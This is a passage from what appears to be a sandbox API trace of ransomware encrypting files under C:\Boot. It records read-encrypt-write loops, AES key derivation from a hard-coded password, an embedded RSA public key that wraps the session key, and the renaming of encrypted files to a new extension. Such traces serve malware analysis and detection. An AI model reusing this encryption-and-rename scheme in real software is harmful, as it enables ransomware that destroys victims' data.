nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.274] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.274] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.274] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.274] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.274] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.274] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.275] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.275] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.275] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.275] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.275] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.275] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.275] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.275] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.275] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.275] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.275] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.275] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.275] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.275] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.275] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.276] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.276] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.276] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.276] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.276] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.276] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.276] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.276] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.276] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.276] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.276] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.276] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.276] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.276] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.276] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.276] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.276] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.276] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.276] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.277] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.277] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.277] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.277] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.277] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.277] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.277] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.277] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.277] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.277] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.277] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.277] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.277] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.277] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.277] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.278] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.278] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.278] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x80, lpOverlapped=0x0) returned 1 [0126.278] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x80, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x90) returned 1 [0126.278] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x90, lpOverlapped=0x0) returned 1 [0126.278] CloseHandle (hObject=0x5cd8) returned 1 [0126.278] CloseHandle (hObject=0x5cec) returned 1 [0126.280] CopyFileA (lpExistingFileName="C:\\\\Boot\\BOOTSTAT.DAT.gsg" (normalized: "c:\\boot\\bootstat.dat.gsg"), lpNewFileName="C:\\\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), bFailIfExists=0) returned 1 [0126.416] SetFileAttributesA (lpFileName="C:\\\\Boot\\BOOTSTAT.DAT", dwFileAttributes=0x4) returned 1 [0126.417] DeleteFileA (lpFileName="C:\\\\Boot\\BOOTSTAT.DAT.gsg" (normalized: "c:\\boot\\bootstat.dat.gsg")) returned 1 [0126.418] MoveFileA (lpExistingFileName="C:\\\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="C:\\\\Boot\\BOOTSTAT.DAT.fuck" (normalized: "c:\\boot\\bootstat.dat.fuck")) returned 1 [0126.419] CryptDestroyHash (hHash=0x69d368) returned 1 [0126.419] CryptDestroyKey (hKey=0x69d6e8) returned 1 [0126.419] CryptReleaseContext (hProv=0x5b00c8, dwFlags=0x0) returned 1 [0126.419] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0126.419] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0126.419] FindFirstFileA (in: lpFileName="C:\\\\Boot\\cs-CZ\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x69d328 [0126.422] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.422] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.422] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.422] GetLastError () returned 0x0 [0126.422] SetLastError (dwErrCode=0x0) [0126.422] GetLastError () returned 0x0 [0126.422] SetLastError (dwErrCode=0x0) [0126.422] GetLastError () returned 0x0 [0126.422] SetLastError (dwErrCode=0x0) [0126.422] GetLastError () returned 0x0 [0126.422] SetLastError (dwErrCode=0x0) [0126.422] GetLastError () returned 0x0 [0126.422] SetLastError (dwErrCode=0x0) [0126.422] GetLastError () returned 0x0 [0126.422] SetLastError (dwErrCode=0x0) [0126.422] GetLastError () returned 0x0 [0126.422] SetLastError (dwErrCode=0x0) [0126.422] GetLastError () returned 0x0 [0126.422] SetLastError (dwErrCode=0x0) [0126.422] GetLastError () returned 0x0 [0126.422] SetLastError (dwErrCode=0x0) [0126.422] GetLastError () returned 0x0 [0126.422] SetLastError (dwErrCode=0x0) [0126.422] GetLastError () returned 0x0 [0126.423] SetLastError (dwErrCode=0x0) [0126.423] GetLastError () returned 0x0 [0126.423] SetLastError (dwErrCode=0x0) [0126.423] GetLastError () returned 0x0 [0126.423] SetLastError (dwErrCode=0x0) [0126.423] GetLastError () returned 0x0 [0126.423] SetLastError (dwErrCode=0x0) [0126.423] GetLastError () returned 0x0 [0126.423] SetLastError (dwErrCode=0x0) [0126.423] GetLastError () returned 0x0 [0126.423] SetLastError (dwErrCode=0x0) [0126.423] GetLastError () returned 0x0 [0126.423] SetLastError (dwErrCode=0x0) [0126.423] GetLastError () returned 0x0 [0126.423] SetLastError (dwErrCode=0x0) [0126.423] GetLastError () returned 0x0 [0126.423] SetLastError (dwErrCode=0x0) [0126.423] GetLastError () returned 0x0 [0126.423] SetLastError (dwErrCode=0x0) [0126.423] GetLastError () returned 0x0 [0126.423] SetLastError (dwErrCode=0x0) [0126.423] GetLastError () returned 0x0 [0126.423] SetLastError (dwErrCode=0x0) [0126.423] GetLastError () returned 0x0 [0126.423] SetLastError (dwErrCode=0x0) [0126.423] GetLastError () returned 0x0 [0126.423] SetLastError (dwErrCode=0x0) [0126.423] GetLastError () returned 0x0 [0126.423] SetLastError (dwErrCode=0x0) [0126.424] GetFileAttributesA (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20 [0126.424] SetFileAttributesA (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0126.424] CreateFileA (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.424] CreateFileA (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.425] SetFileAttributesA (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0126.425] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27df958) returned 1 [0126.426] CryptCreateHash (in: hProv=0x27df958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.426] lstrlenA (lpString="swVGAbWiEnRNHPeSGjNvHnzlzMlQm") returned 29 [0126.426] CryptHashData (hHash=0x69d6e8, pbData=0x5bcd68, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.426] CryptDeriveKey (in: hProv=0x27df958, Algid=0x6610, hBaseData=0x69d6e8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d3a8) returned 1 [0126.427] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.427] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.427] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27df7c0) returned 1 [0126.427] CryptImportPublicKeyInfo (in: hCryptProv=0x27df7c0, dwCertEncodingType=0x1, pInfo=0x27da6b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27da6e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27da6f0*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69d3e8) returned 1 [0126.427] CryptEncrypt (in: hKey=0x69d3e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.427] CryptEncrypt (in: hKey=0x69d3e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27df9e0*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27df9e0*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.427] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27df9e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27df9e0*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.428] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e0950, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e0950, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.428] CryptEncrypt (in: hKey=0x69d3a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e0950*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27e0950*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.428] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27e0950*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e0950*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.428] CloseHandle (hObject=0xffffffff) returned 1 [0126.428] CloseHandle (hObject=0x5cd8) returned 1 [0126.429] CopyFileA (lpExistingFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0126.432] SetFileAttributesA (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0126.432] DeleteFileA (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.gsg")) returned 1 [0126.433] MoveFileA (lpExistingFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.fuck")) returned 0 [0126.433] CryptDestroyHash (hHash=0x69d6e8) returned 1 [0126.433] CryptDestroyKey (hKey=0x69d3a8) returned 1 [0126.433] CryptReleaseContext (hProv=0x27df958, dwFlags=0x0) returned 1 [0126.433] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.433] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.434] GetLastError () returned 0x5 [0126.434] SetLastError (dwErrCode=0x5) [0126.434] GetLastError () returned 0x5 [0126.434] SetLastError (dwErrCode=0x5) [0126.434] GetLastError () returned 0x5 [0126.434] SetLastError 